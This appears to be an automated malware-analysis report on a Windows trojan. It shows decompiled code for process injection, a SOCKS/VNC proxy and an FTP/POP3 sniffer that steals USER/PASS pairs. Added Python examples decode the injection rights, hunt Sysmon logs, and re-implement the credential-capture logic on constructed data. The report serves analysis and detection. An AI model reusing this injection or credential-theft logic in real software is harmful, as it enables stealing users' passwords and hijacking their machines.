    										if(_t56 == 0xffffffff) {
    											L40:
    											E0040F0C0(_v8);
    											_t58 = _a7;
    											L41:
    											return _t58;
    										}
    										_t88 =  *0x416df0; // 0x0
    										__eflags = _t88;
    										if(_t88 == 0) {
    											_t59 = 0;
    											__eflags = 0;
    										} else {
    											_t59 = E0040F521(_t88);
    										}
    										_push(_t96);
    										_t60 = E0040A033(_t88, _t59, __eflags, _a12, 1, _t88);
    										__eflags = _t60;
    										if(_t60 == 0) {
    											L39:
    											E004108F5(_a12);
    											goto L40;
    										} else {
    											_a7 = 1;
    											while(1) {
    												_t100 = E0041080E(0,  &_a12, 0x3e8, 0);
    												__eflags = _t100 - 0xffffffff;
    												if(_t100 != 0xffffffff) {
    													goto L28;
    												}
    												L27:
    												_t78 =  *0x416de4();
    												__eflags = _t78 - 0x274c;
    												if(_t78 != 0x274c) {
    													goto L39;
    												}
    												L28:
    												_t65 = WaitForSingleObject( *0x416a8c, 0);
    												__eflags = _t65;
    												if(_t65 == 0) {
    													goto L39;
    												}
    												L29:
    												__eflags = _t100 - 0xffffffff;
    												if(_t100 == 0xffffffff) {
    													do {
    														_t100 = E0041080E(0,  &_a12, 0x3e8, 0);
    														__eflags = _t100 - 0xffffffff;
    														if(_t100 != 0xffffffff) {
    															goto L28;
    														}
    														goto L27;
    													} while (_t100 == 0xffffffff);
    												}
    												_t68 = E00409F48( &_v24, _t88, _a12,  &_v12);
    												__eflags = _t68;
    												if(_t68 == 0) {
    													goto L39;
    												}
    												__eflags = _v20 - 2;
    												_t95 = _v12;
    												if(_v20 != 2) {
    													L38:
    													E0040F0C0(_t95);
    													continue;
    												}
    												__eflags = _v22 - 4;
    												if(_v22 != 4) {
    													goto L38;
    												}
    												_t70 = 0x10;
    												_t101 = E0040F0A8(_t70);
    												__eflags = _t101;
    												if(__eflags == 0) {
    													goto L38;
    												}
    												 *((short*)(_t101 + 8)) = _v16;
    												 *((intOrPtr*)(_t101 + 4)) = _t84;
    												 *((intOrPtr*)(_t101 + 0xc)) =  *_t95;
    												_t74 = E0040F113(__eflags, _v8, _t84);
    												 *_t101 = _t74;
    												__eflags = _t74;
    												if(_t74 == 0) {
    													L37:
    													E0040F0C0(_t101);
    													goto L38;
    												}
    												 *0x416a88 =  *0x416a88 + 1;
    												_t76 = E0040C14A(_t88, E0040A1CA, _t101);
    												__eflags = _t76;
    												if(_t76 > 0) {
    													goto L38;
    												}
    												 *0x416a88 =  *0x416a88 - 1;
    												__eflags =  *0x416a88;
    												E0040F0C0( *_t101);
    												goto L37;
    											}
    										}
    									}
    									_t58 = 0;
    									goto L41;
    								}
    								_t53 =  *(_t53 + 0x1c);
    							}
    							_t84 = _a4;
    							goto L17;
    						}
    						goto L10;
    					}
    					_t79 =  *0x416a84; // 0x0
    					__eflags = _t79 - 0xffffffff;
    					if(_t79 != 0xffffffff) {
    						L5:
    						_a4 = 0x26;
    						_t80 =  *0x416dc8(_t79,  &_v64,  &_a4);
    						__eflags = _t80;
    						if(_t80 != 0) {
    							goto L10;
    						}
    						_t47 = _v62 << 0x00000008 | _v61 & 0x000000ff;
    						goto L8;
    					}
    					_t79 = E00409164(_t86);
    					 *0x416a84 = _t79;
    					__eflags = _t79 - 0xffffffff;
    					if(_t79 == 0xffffffff) {
    						goto L10;
    					}
    					goto L5;
    				}
    				_t49 =  *0x416a94 & 0x0000ffff;
    				goto L9;
    			}

    APIs
    • lstrcmpi.KERNEL32(?,socks), ref: 0040A269
    • lstrcmpi.KERNEL32(?,rfb), ref: 0040A284
    • getsockname.WS2_32(00000000,?,?), ref: 0040A2B7
    • getaddrinfo.WS2_32(?,?,00000000,?), ref: 0040A30D
    • FreeAddrInfoW.WS2_32(?), ref: 0040A331
    • WSAGetLastError.WS2_32(?,000003E8,00000000,?,?,?,?,?), ref: 0040A3B2
    • WaitForSingleObject.KERNEL32(00000000,?,000003E8,00000000,?,?,?,?,?), ref: 0040A3CB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: lstrcmpi$AddrErrorFreeInfoLastObjectSingleWaitgetaddrinfogetsockname
    • String ID: &$rfb$socks
    • API String ID: 685222424-3548288392
    • Opcode ID: ea518c76d34beccc2495a752093e9d8d48186725c312375eb382ba120c69b5d3
    • Instruction ID: ce68a77d7c3ecf8f393eda33a0cffa13b385a0ea53feacbb8a8055cb473090f5
    • Opcode Fuzzy Hash: ea518c76d34beccc2495a752093e9d8d48186725c312375eb382ba120c69b5d3
    • Instruction Fuzzy Hash: 3C51BF34500305ABCB20AF65CC49AEE3BA8AF00354F14817AF825BB2E1D779D965DB5E
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • RtlEnterCriticalSection.NTDLL(00417030), ref: 0040E64F
    • ResetEvent.KERNEL32(?), ref: 0040E67D
    • SetEvent.KERNEL32(?), ref: 0040E6BF
    • RtlLeaveCriticalSection.NTDLL(00417030), ref: 0040E6C6
    • InternetQueryOptionA.WININET(?,0000002D,00000000,?), ref: 0040E6EF
    • InternetSetOptionA.WININET(?,0000002D,00000000,00000004), ref: 0040E705
    • RtlLeaveCriticalSection.NTDLL(00417030), ref: 0040E712
    • InternetReadFile.WININET(?,?,?,?), ref: 0040E72A
    • InternetReadFileExA.WININET(?,?,?,?), ref: 0040E744
    • InternetReadFileExW.WININET(?,?,?,?), ref: 0040E758
    • InternetQueryDataAvailable.WININET(?,?,?,?), ref: 0040E766
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Internet$CriticalFileReadSection$EventLeaveOptionQuery$AvailableDataEnterReset
    • String ID:
    • API String ID: 830436639-0
    • Opcode ID: 178fef782297f701932f832b3a27cd04d67d8101068307ee0276cb8a94bd58ea
    • Instruction ID: 24679c4264759586a79c1bb75c3a59ae3f99d2c15d7f0d2fdf2446b1418ede4c
    • Opcode Fuzzy Hash: 178fef782297f701932f832b3a27cd04d67d8101068307ee0276cb8a94bd58ea
    • Instruction Fuzzy Hash: F1418C71500208FFDF129F61EC48ADA7F7AFB04314F218866F911A61A1C73AD9A1DB98
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 88%
    			E0040A6A0() {
    				void* _v8;
    				char _v12;
    				intOrPtr _v16;
    				int _v20;
    				short _v544;
    				long _v572;
    				void* _v580;
    				void* __edi;
    				intOrPtr _t20;
    				void* _t25;
    				void* _t26;
    				intOrPtr _t28;
    				void* _t30;
    				void* _t36;
    				void* _t38;
    
    				_t20 =  *0x416c34; // 0x25df5a8
    				_t1 = _t20 + 0x2c; // 0x25df908
    				_v16 = E0040B37A(0,  *_t1, 4, 0, 0, 0, 0);
    				_t36 = GetCurrentThread();
    				_v20 = GetThreadPriority(_t36);
    				SetThreadPriority(_t36, 1);
    				_v12 = 3;
    				do {
    					_v580 = 0x22c;
    					_t25 = CreateToolhelp32Snapshot(2, 0);
    					_t37 =  &_v580;
    					_v8 = _t25;
    					Process32FirstW(_t25,  &_v580);
    					while(_t25 != 0) {
    						_t26 = _v572;
    						__eflags = _t26;
    						if(_t26 != 0) {
    							__eflags = _t26 -  *0x416d78; // 0x12fc
    							if(__eflags != 0) {
    								__eflags = _t26 - _v16;
    								if(_t26 != _v16) {
    									_t28 =  *0x416c34; // 0x25df5a8
    									_t10 = _t28 + 0x50; // 0x25dfb10
    									_t30 = lstrcmpiW( &_v544,  *_t10);
    									__eflags = _t30;
    									if(_t30 != 0) {
    										_t38 = OpenProcess(0x43a, 0, _v572);
    										__eflags = _t38;
    										if(_t38 != 0) {
    											_push(_v572);
    											E0040776D(_t37, _t38);
    											CloseHandle(_t38);
    										}
    									}
    								}
    							}
    						}
    						_t25 = Process32NextW(_v8,  &_v580);
    					}
    					CloseHandle(_v8);
    					_t17 =  &_v12;
    					 *_t17 = _v12 - 1;
    				} while ( *_t17 != 0);
    				return SetThreadPriority(_t36, _v20);
    			}

    Instruction addresses: 0x0040a6a9 to 0x0040a79a (per-line address column, separated from the C code by extraction)

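    Added example, not from the report or the sample: the OpenProcess mask 0x43a that E0040A6A0 requests above, decoded into PROCESS_* rights, plus a small hunt over Sysmon Event ID 10 (ProcessAccess) records for the pattern this loop produces on a host, one source opening many distinct targets with thread-creation and memory-write rights in quick succession (the loop walks the whole snapshot three times, so the same target shows up repeatedly). The record format, paths and pids are constructed for the example; Python is used because this is analyst tooling, not the sample's own code.

```python
# Added example: decode the OpenProcess access mask seen in E0040A6A0 and hunt for
# the "open every process with injection rights" pattern in Sysmon Event ID 10 data.
# The event lines below are constructed for the example, not taken from the report.
from collections import defaultdict

PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}

# Rights a writer/injector needs: allocate+protect, write, and start a thread.
INJECT_RIGHTS = 0x0002 | 0x0008 | 0x0020


def decode_access(mask):
    """Return the PROCESS_* names set in an access mask, lowest bit first."""
    return [name for bit, name in sorted(PROCESS_RIGHTS.items()) if mask & bit]


# Constructed Sysmon Event ID 10 (ProcessAccess) records, pipe-separated:
# time|SourceImage|SourceProcessId|TargetImage|TargetProcessId|GrantedAccess
SAMPLE_EVENTS = """\
2021-05-08 10:00:01|C:\\Users\\user\\AppData\\Roaming\\sample.exe|4860|C:\\Windows\\explorer.exe|1234|0x43A
2021-05-08 10:00:01|C:\\Users\\user\\AppData\\Roaming\\sample.exe|4860|C:\\Windows\\System32\\svchost.exe|788|0x43A
2021-05-08 10:00:01|C:\\Users\\user\\AppData\\Roaming\\sample.exe|4860|C:\\Program Files\\Google\\Chrome\\chrome.exe|2200|0x43A
2021-05-08 10:00:02|C:\\Windows\\System32\\taskmgr.exe|3100|C:\\Program Files\\Google\\Chrome\\chrome.exe|2200|0x1400
2021-05-08 10:00:02|C:\\ProgramData\\Microsoft\\Windows Defender\\MsMpEng.exe|2400|C:\\Users\\user\\AppData\\Roaming\\sample.exe|4860|0x1410
2021-05-08 10:00:02|C:\\Users\\user\\AppData\\Roaming\\sample.exe|4860|C:\\Windows\\explorer.exe|1234|0x43A
2021-05-08 10:00:02|C:\\Users\\user\\AppData\\Roaming\\sample.exe|4860|C:\\Windows\\System32\\lsass.exe|640|0x43A
"""


def parse_events(text):
    """Yield one dict per non-empty record line."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, spid, dst, dpid, access = line.split("|")
        yield {
            "time": ts,
            "source": src,
            "source_pid": int(spid),
            "target": dst,
            "target_pid": int(dpid),
            "access": int(access, 16),
        }


def find_injectors(events, min_targets=3):
    """
    Map (source image, source pid) -> sorted distinct target pids for every source
    that opened at least `min_targets` distinct processes with all INJECT_RIGHTS set.
    GrantedAccess == 0x43A alone would be a narrow match for this sample; testing the
    rights bits also catches variants that ask for a superset.
    """
    opened = defaultdict(set)
    for ev in events:
        if (ev["access"] & INJECT_RIGHTS) == INJECT_RIGHTS:
            opened[(ev["source"], ev["source_pid"])].add(ev["target_pid"])
    return {k: sorted(v) for k, v in opened.items() if len(v) >= min_targets}


if __name__ == "__main__":
    print("0x43A =", " | ".join(decode_access(0x43A)))
    for (src, pid), targets in find_injectors(parse_events(SAMPLE_EVENTS)).items():
        print(f"{src} (pid {pid}) opened {len(targets)} processes for injection: {targets}")
```

    Task Manager querying a process (0x1400) and an AV engine reading memory (0x1410) do not carry PROCESS_CREATE_THREAD or PROCESS_VM_WRITE and are left alone; the sample's own handles to explorer.exe, svchost.exe, chrome.exe and lsass.exe are reported once per target even though the three-pass loop opens explorer.exe twice.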

    APIs
      • Part of subcall function 0040B37A: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,000000FF,?,?,00000000), ref: 0040B3CF
      • Part of subcall function 0040B37A: SetNamedPipeHandleState.KERNEL32(00000000,000000FF,00000000,00000000,?,?,00000000), ref: 0040B3EA
      • Part of subcall function 0040B37A: WriteFile.KERNEL32(00000000,025DF908,00000004,00000002,00000000,?,?,00000000), ref: 0040B406
      • Part of subcall function 0040B37A: WriteFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040B41F
      • Part of subcall function 0040B37A: WriteFile.KERNEL32(00000000,00000000,00000000,00000002,00000000,?,?,00000000), ref: 0040B439
      • Part of subcall function 0040B37A: ReadFile.KERNEL32(00000000,00000002,00000004,00000002,00000000,?,?,00000000), ref: 0040B452
      • Part of subcall function 0040B37A: ReadFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040B46F
    • GetCurrentThread.KERNEL32 ref: 0040A6C4
    • GetThreadPriority.KERNEL32(00000000), ref: 0040A6CD
    • SetThreadPriority.KERNEL32(00000000,00000001), ref: 0040A6D9
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040A6F3
    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040A704
    • lstrcmpiW.KERNEL32(?,025DFB10), ref: 0040A732
    • OpenProcess.KERNEL32(0000043A,00000000,?), ref: 0040A748
    • CloseHandle.KERNEL32(00000000), ref: 0040A760
    • Process32NextW.KERNEL32(?,0000022C), ref: 0040A770
    • CloseHandle.KERNEL32(?), ref: 0040A77D
    • SetThreadPriority.KERNEL32(00000000,?), ref: 0040A790
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$Thread$HandlePriorityWrite$CloseCreateProcess32Read$CurrentFirstNamedNextOpenPipeProcessSnapshotStateToolhelp32lstrcmpi
    • String ID:
    • API String ID: 2830737922-0
    • Opcode ID: ffb84d6495e197df523e2169df8f562549ae68d509439645d1dc38bffc1f7429
    • Instruction ID: b1eca715c35784697980cff18624b3c50065e512fa52b271b0e4a4991b01286d
    • Opcode Fuzzy Hash: ffb84d6495e197df523e2169df8f562549ae68d509439645d1dc38bffc1f7429
    • Instruction Fuzzy Hash: BE211971900218ABCF20ABA1ED8DEDE7B78FF04354F0680A5F109A21A0D774DA91CB59
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 73%
    			E0040EC7F(void* __eax, int _a4, int _a8) {
    				int _v24;
    				signed char _v28;
    				signed char _v29;
    				signed char _v30;
    				signed char _v31;
    				signed int _v32;
    				signed int _v34;
    				int _v36;
    				char _v37;
    				char _v49;
    				void* __esi;
    				int _t74;
    				void* _t75;
    				intOrPtr _t76;
    				int _t82;
    				int _t85;
    				int _t97;
    				int _t99;
    				int _t101;
    				int _t103;
    				int _t105;
    				int _t107;
    				void* _t108;
    				int _t110;
    				int _t117;
    				int _t128;
    				signed int _t129;
    				char* _t133;
    				intOrPtr _t134;
    				int _t140;
    				int _t147;
    				int _t149;
    				intOrPtr _t151;
    				int _t154;
    				int _t157;
    
    				_t74 = __eax;
    				_t149 = _a8;
    				_t154 = __eax;
    				if(( *0x416cd0 & 0x00000002) == 0) {
    					L3:
    					__eflags = _t149 - 3;
    					if(_t149 < 3) {
    						L72:
    						return _t74;
    					}
    					_t74 = 0;
    					__eflags = _t154;
    					if(_t154 == 0) {
    						goto L72;
    					}
    					__eflags = _a4;
    					if(_a4 == 0) {
    						goto L72;
    					}
    					_v28 = 0;
    					_v32 = 0;
    					_t75 =  *_t154;
    					__eflags = _t75 - 0x55;
    					if(_t75 != 0x55) {
    						L12:
    						__eflags = _t75 - 0x50;
    						if(_t75 != 0x50) {
    							while(1) {
    								L40:
    								__eflags = _t149 - 1;
    								if(_t149 <= 1) {
    									break;
    								}
    								_t76 =  *((intOrPtr*)(_t154 + _t149 - 1));
    								__eflags = _t76 - 0xd;
    								if(_t76 == 0xd) {
    									L39:
    									_t149 = _t149 - 1;
    									__eflags = _t149;
    									continue;
    								}
    								__eflags = _t76 - 0xa;
    								if(_t76 != 0xa) {
    									break;
    								}
    								goto L39;
    							}
    							_t74 = _t149 - 3;
    							__eflags = _t74 - 1;
    							if(_t74 > 1) {
    								goto L72;
    							}
    							 *0x416fe8(0x417048);
    							_t128 = E0040EB48(_a4);
    							_v32 = _t128;
    							__eflags = _t128;
    							if(_t128 == 0) {
    								L71:
    								_t74 =  *0x416fec(0x417048);
    								goto L72;
    							}
    							__eflags =  *(_t128 + 4);
    							if( *(_t128 + 4) == 0) {
    								L69:
    								_push(0);
    								L70:
    								E0040EBDD(_t128);
    								goto L71;
    							}
    							__eflags =  *(_t128 + 8);
    							if( *(_t128 + 8) == 0) {
    								goto L69;
    							}
    							__eflags = _t149 - 3;
    							if(_t149 != 3) {
    								_t129 = 4;
    								__eflags = _t149 - _t129;
    								if(_t149 != _t129) {
    									goto L71;
    								}
    								_t151 =  *0x416c34; // 0x25df5a8
    								_t47 = _t151 + 0x130; // 0x2563cf1
    								_t141 = _t129;
    								_t82 = E0040F547(_t129, _t154, _t129,  *_t47);
    								__eflags = _t82;
    								if(_t82 == 0) {
    									L55:
    									_v37 = 1;
    									L59:
    									_t128 = _v28;
    									L60:
    									_v28 = 0x10;
    									_t85 =  *0x416da0(_a4,  &_v24,  &_v28);
    									__eflags = _t85;
    									if(_t85 != 0) {
    										L64:
    										__eflags = _v49 - 2;
    										if(_v49 != 2) {
    											L67:
    											_push(0);
    											goto L70;
    										}
    										_t133 = "pop3";
    										L66:
    										_push((_v34 & 0xff) << 0x00000008 | (_v34 & 0x0000ffff) >> 0x00000008);
    										_push(_v29 & 0x000000ff);
    										_push(_v30 & 0x000000ff);
    										_push(_v31 & 0x000000ff);
    										_push(_v32 & 0x000000ff);
    										_push( *(_t128 + 8));
    										_push( *(_t128 + 4));
    										__eflags = _v49 - 1;
    										__eflags = (_v49 != 1) + 0x64;
    										E0041540F(_t133, (_v34 & 0xff) << 0x00000008 | (_v34 & 0x0000ffff) >> 0x00000008, (_v49 != 1) + 0x64, (_v49 != 1) + 0x64, 0, 0, L"%S://%S:%S@%u.%u.%u.%u:%u/", _t133);
    										goto L67;
    									}
    									_t97 = E00406B02( &_v36);
    									__eflags = _t97;
    									if(_t97 != 0) {
    										goto L64;
    									}
    									__eflags = _v49 - 1;
    									if(_v49 != 1) {
    										goto L64;
    									}
    									_t134 =  *0x416c34; // 0x25df5a8
    									_t61 = _t128 + 4; // 0x0
    									_t62 = _t134 + 0x144; // 0x2563d39
    									_t99 = E0040F547(_t141 | 0xffffffff,  *_t62, _t141 | 0xffffffff,  *_t61);
    									__eflags = _t99;
    									if(_t99 != 0) {
    										_t133 = "ftp";
    										goto L66;
    									}
    									goto L64;
    								}
    								_t48 = _t151 + 0x134; // 0x2563db1
    								_t141 = _t129;
    								_t101 = E0040F547(_t129, _t154, _t129,  *_t48);
    								__eflags = _t101;
    								if(_t101 == 0) {
    									goto L55;
    								}
    								_t49 = _t151 + 0x138; // 0x2563cc1
    								_t141 = _t129;
    								_t103 = E0040F547(_t129, _t154, _t129,  *_t49);
    								__eflags = _t103;
    								if(_t103 != 0) {
    									_t51 = _t151 + 0x13c; // 0x2563d51
    									_t141 = _t129;
    									_t105 = E0040F547(_t129, _t154, _t129,  *_t51);
    									__eflags = _t105;
    									if(_t105 == 0) {
    										L58:
    										_v37 = 2;
    										goto L59;
    									}
    									_t52 = _t151 + 0x140; // 0x2563d09
    									_t141 = _t129;
    									_t107 = E0040F547(_t129, _t154, _t129,  *_t52);
    									__eflags = _t107;
    									if(_t107 != 0) {
    										goto L71;
    									}
    									goto L58;
    								}
    								goto L55;
    							}
    							_t108 =  *_t154;
    							__eflags = _t108 - 0x43;
    							if(_t108 == 0x43) {
    								L48:
    								__eflags =  *((char*)(_t154 + 1)) - 0x57;
    								if( *((char*)(_t154 + 1)) != 0x57) {
    									goto L71;
    								}
    								__eflags =  *((char*)(_t154 + 2)) - 0x44;
    								if( *((char*)(_t154 + 2)) != 0x44) {
    									goto L71;
    								}
    								_v37 = 1;
    								goto L60;
    							}
    							__eflags = _t108 - 0x50;
    							if(_t108 != 0x50) {
    								goto L71;
    							}
    							goto L48;
    						}
    						__eflags =  *((char*)(_t154 + 1)) - 0x41;
    						if( *((char*)(_t154 + 1)) != 0x41) {
    							goto L40;
    						}
    						__eflags =  *((char*)(_t154 + 2)) - 0x53;
    						if( *((char*)(_t154 + 2)) != 0x53) {
    							goto L40;
    						}
    						__eflags =  *((char*)(_t154 + 3)) - 0x53;
    						if( *((char*)(_t154 + 3)) != 0x53) {
    							goto L40;
    						}
    						__eflags =  *((char*)(_t154 + 4)) - 0x20;
    						if( *((char*)(_t154 + 4)) != 0x20) {
    							goto L40;
    						} else {
    							_v28 = 5;
    							L18:
    							_t18 = _t149 - _v32 + 1; // 0x6
    							_t74 = E0040F0A8(_t18);
    							_t147 = _t74;
    							_v24 = _t147;
    							__eflags = _t147;
    							if(_t147 == 0) {
    								goto L72;
    							}
    							_t140 = _v32;
    							__eflags = _t140;
    							if(_t140 == 0) {
    								_t140 = _v28;
    							}
    							while(1) {
    								__eflags = _t140 - _t149;
    								if(_t140 >= _t149) {
    									break;
    								}
    								_t110 =  *((intOrPtr*)(_t140 + _t154));
    								__eflags = _t110 - 0xa;
    								if(_t110 != 0xa) {
    									__eflags = _t110 - 0xd;
    									if(_t110 != 0xd) {
    										__eflags = _t110;
    										if(_t110 != 0) {
    											 *_t147 = _t110;
    										}
    									}
    								}
    								_t140 = _t140 + 1;
    								_t147 = _t147 + 1;
    								__eflags = _t147;
    							}
    							 *0x416fe8(0x417048);
    							__eflags = _v36;
    							if(_v36 == 0) {
    								__eflags = _v32;
    								if(_v32 == 0) {
    									L36:
    									 *0x416fec(0x417048);
    									_t74 = E0040F0C0(_v32);
    									goto L72;
    								}
    								_t157 = E0040EB48(_a4);
    								__eflags = _t157;
    								if(_t157 == 0) {
    									goto L36;
    								}
    								E0040F0C0( *(_t157 + 8));
    								__eflags = _a8 - _v36;
    								_t117 = E0040F244(_a8 - _v36, _v32);
    								 *(_t157 + 8) = _t117;
    								L34:
    								__eflags = _t117;
    								if(_t117 == 0) {
    									E0040EBDD(_t157, _t117);
    								}
    								goto L36;
    							}
    							_t157 = E0040EB48(_a4);
    							__eflags = _t157;
    							if(_t157 != 0) {
    								L30:
    								E0040EBDD(_t157, 1);
    								 *_t157 = _a4;
    								_t117 = E0040F244(_t131, _v32);
    								 *(_t157 + 4) = _t117;
    								goto L34;
    							}
    							_t157 = E0040EB80(_a4);
    							__eflags = _t157;
    							if(_t157 == 0) {
    								goto L36;
    							}
    							goto L30;
    						}
    					}
    					__eflags =  *((char*)(_t154 + 1)) - 0x53;
    					if( *((char*)(_t154 + 1)) != 0x53) {
    						goto L12;
    					}
    					__eflags =  *((char*)(_t154 + 2)) - 0x45;
    					if( *((char*)(_t154 + 2)) != 0x45) {
    						goto L12;
    					}
    					__eflags =  *((char*)(_t154 + 3)) - 0x52;
    					if( *((char*)(_t154 + 3)) != 0x52) {
    						goto L12;
    					}
    					__eflags =  *((char*)(_t154 + 4)) - 0x20;
    					if( *((char*)(_t154 + 4)) != 0x20) {
    						goto L12;
    					} else {
    						_v32 = 5;
    						goto L18;
    					}
    				}
    				_t74 = IsBadHugeWritePtr(__eax, _t149);
    				if(_t74 != 0) {
    					goto L3;
    				} else {
    					_t74 = E0040F173(E004101D4(0xff, _t74), _t154, _t125, _t149);
    					goto L72;
    				}
    			}

    Instruction addresses: 0x0040ec7f to 0x0040f002 (per-line address column, separated from the C code by extraction)

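    Added example: the USER/PASS capture state machine of E0040EC7F re-implemented in Python for analysis; this is not the sample's code. What the decompiled function shows and the example mirrors: the "USER " and "PASS " prefixes, the copy that stops at the first CR, LF or NUL, the requirement that a later buffer be 3 or 4 bytes after trailing CR/LF are stripped, the hard-coded "CWD"/"PWD" check, getpeername() into a sockaddr_in whose port is byte-swapped before formatting, the format string %S://%S:%S@%u.%u.%u.%u:%u/, and the report type (_v49 != 1) + 0x64 handed to E0041540F. The 4-byte confirmation tokens are read from the config (cfg+0x130 .. cfg+0x140) and are not present in this dump, so the token sets below are assumptions, as are the socket ids and peer addresses.

```python
# Added example: re-implementation, for analysis only, of the USER/PASS capture
# state machine visible in E0040EC7F. Sockets, peer addresses and the 4-byte
# confirmation tokens are constructed stand-ins; the sample's config strings
# are not in the dump.
import struct

FTP, POP3 = 1, 2
# 3-byte confirmation commands are hard-coded in the function ("CWD", "PWD").
# The 4-byte ones live in the sample's config; these sets are assumptions.
FTP_TOKENS_4 = {b"PASV", b"TYPE", b"SYST"}
POP3_TOKENS_4 = {b"STAT", b"LIST"}
REPORT_TYPE = {FTP: 0x64, POP3: 0x65}  # (_v49 != 1) + 0x64 in the decompiled code


def peer_from_sockaddr(raw):
    """Parse a 16-byte sockaddr_in the way the function does after getpeername():
    the port is byte-swapped (network order), the address printed byte by byte."""
    family, port_be = struct.unpack("<HH", raw[:4])
    if family != 2:  # AF_INET
        raise ValueError("not AF_INET")
    port = ((port_be & 0xFF) << 8) | (port_be >> 8)
    ip = ".".join(str(b) for b in raw[4:8])
    return ip, port


def _value(data):
    """The USER/PASS argument: everything after the 5-byte prefix up to the first
    CR, LF or NUL (the copy loop leaves those bytes unset in a zeroed buffer)."""
    val = data[5:]
    for stop in (b"\r", b"\n", b"\x00"):
        val = val.split(stop, 1)[0]
    return val.decode("latin-1")


class CredSniffer:
    """Per-socket USER/PASS tracking keyed by socket id, as the function keys its
    entry list by socket handle. `peers` maps socket id -> raw sockaddr_in bytes."""

    def __init__(self, peers):
        self.peers = peers
        self.entries = {}  # sock -> {"user": str | None, "pass": str | None}

    def on_send(self, sock, data):
        if len(data) < 3 or not sock:
            return None
        if data.startswith(b"USER "):
            self.entries[sock] = {"user": _value(data), "pass": None}
            return None
        if data.startswith(b"PASS "):
            if sock in self.entries:          # no entry: the copy is just freed
                self.entries[sock]["pass"] = _value(data)
            return None
        token = data.rstrip(b"\r\n")
        if len(token) not in (3, 4):
            return None
        entry = self.entries.get(sock)
        if entry is None:
            return None
        if entry["user"] is None or entry["pass"] is None:
            del self.entries[sock]             # incomplete entry is discarded
            return None
        if token in (b"CWD", b"PWD") or token in FTP_TOKENS_4:
            proto = FTP
        elif token in POP3_TOKENS_4:
            proto = POP3
        else:
            return None
        ip, port = peer_from_sockaddr(self.peers[sock])
        name = "ftp" if proto == FTP else "pop3"
        # Format string from the dump: "%S://%S:%S@%u.%u.%u.%u:%u/"
        url = f"{name}://{entry['user']}:{entry['pass']}@{ip}:{port}/"
        return url, REPORT_TYPE[proto]


def demo_session():
    """Constructed traffic: one FTP login, one POP3 login, one stray PASS."""
    peers = {
        7: b"\x02\x00\x00\x15\xc0\xa8\x01\x0a" + b"\x00" * 8,   # 192.168.1.10:21
        9: b"\x02\x00\x00\x6e\x0a\x00\x00\x05" + b"\x00" * 8,   # 10.0.0.5:110
        11: b"\x02\x00\x00\x15\x0a\x00\x00\x06" + b"\x00" * 8,  # 10.0.0.6:21
    }
    sniffer = CredSniffer(peers)
    sends = [
        (7, b"USER alice\r\n"), (7, b"PASS s3cret\r\n"), (7, b"PWD\r\n"),
        (9, b"USER bob\r\n"), (9, b"PASS hunter2\r\n"), (9, b"STAT\r\n"),
        (11, b"PASS nouser\r\n"), (11, b"PWD\r\n"),
    ]
    return [r for r in (sniffer.on_send(s, d) for s, d in sends) if r is not None]


if __name__ == "__main__":
    for url, kind in demo_session():
        print(hex(kind), url)
```

    The function never reports on USER or PASS itself; a credential pair leaves the host only when a short follow-up command arrives on the same socket, which is why a client that authenticates and then immediately sends a long command, or disconnects, produces nothing. The extra checks around getpeername() (E00406B02 and the comparison of the user name against cfg+0x144) are not modelled because their meaning is not visible in this dump.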

    APIs
    • IsBadHugeWritePtr.KERNEL32(?,?), ref: 0040EC9B
    • RtlEnterCriticalSection.NTDLL(00417048), ref: 0040ED88
    • RtlLeaveCriticalSection.NTDLL(00417048), ref: 0040EE08
    • RtlEnterCriticalSection.NTDLL(00417048), ref: 0040EE3F
    • getpeername.WS2_32(?), ref: 0040EF43
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CriticalSection$Enter$HugeLeaveWritegetpeername
    • String ID: %S://%S:%S@%u.%u.%u.%u:%u/$ftp$pop3
    • API String ID: 133427328-3711411108
    • Opcode ID: a9aeeb0b2fe8bfdf17339fe2790413be2d391a27f1075185528f02bc31ae232d
    • Instruction ID: ae62cd487ce1acfe29c235e0b910a31a48c7da8b656b3408e107bf58a9ed15c3
    • Opcode Fuzzy Hash: a9aeeb0b2fe8bfdf17339fe2790413be2d391a27f1075185528f02bc31ae232d
    • Instruction Fuzzy Hash: 68A1E3306043566ADB319F26C844B6BBAD69F84304F048C3FF885A62D2D73CD965D79E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 98%
    			E00408AC4(void* __ecx, signed int __edx, int _a4, signed int _a8, signed short _a12) {
    				char _v5;
    				long _v12;
    				long _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				struct tagWINDOWINFO _v88;
    				void* __ebx;
    				void* __esi;
    				signed short _t98;
    				int _t100;
    				signed int _t102;
    				struct HWND__* _t142;
    				signed char _t148;
    				signed int _t150;
    				long _t153;
